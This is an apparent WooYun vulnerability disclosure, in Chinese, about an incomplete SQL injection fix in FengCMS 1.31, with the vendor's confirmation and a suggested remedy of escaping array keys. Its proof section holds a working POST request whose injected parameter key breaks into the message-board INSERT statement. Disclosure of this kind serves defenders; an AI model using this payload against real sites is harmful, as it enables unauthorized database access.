当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114180

漏洞标题:FengCMS SQL注入(修复不当)

相关厂商:fengcms.com

漏洞作者: xiaoL

提交时间:2015-05-15 10:44

修复时间:2015-08-15 15:32

公开时间:2015-08-15 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-15: 细节已通知厂商并且等待厂商处理中
2015-05-17: 厂商已经确认,细节仅向厂商公开
2015-05-20: 细节向第三方安全合作伙伴开放
2015-07-11: 细节向核心白帽子及相关领域专家公开
2015-07-21: 细节向普通白帽子公开
2015-07-31: 细节向实习白帽子公开
2015-08-15: 细节向公众公开

简要描述:

fengCMS 1.31
前台
修复不当

详细说明:

WooYun: FengCms1.30注入(前台)
去官方查了日志。

FengCms Beta 1.31 更新说明:
修复留言本注入漏洞。感谢乌云darker。


去查看详细的修改记录。

1111.png


增加了addslashes_array

//post数据转义   add by hxl 
	function addslashes_array(&$data) {
	    if(!get_magic_quotes_gpc()){
	        if(is_array($data)){
	            foreach($data as $n=>$v){
	                $b[$n]=addslashes_array($v);
	            }
	            return $b;
	        }else{
	            return addslashes($data);
	        }
	    } 
	    return $data;
	}


这里是对value进行了一次addslashes,但是进入函数之前不是已经转移过了?
果然,这里是对key的一个注入。
所以这样的修复根本没用。

漏洞证明:

最新版1.31
URL:http://localhost/?controller=message&operate=save
title=testtest&name=testtest&qq=123456&tel=15266666666&mail=123%40qq.com&content`,`time`)values(user(),1,2,3,4,5,1431612692);#=testtesttest&vcode=8cwn&time=1431612692

2222.png


5555.png


1111.png

修复方案:

对key进行转义

版权声明:转载请注明来源 xiaoL@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-05-17 15:31

厂商回复:

程序开发的核心人员已经离职,刚刚找的人对程序还不是很熟悉。实在是不好意思,我敦促一下尽快修复。

最新状态:

暂无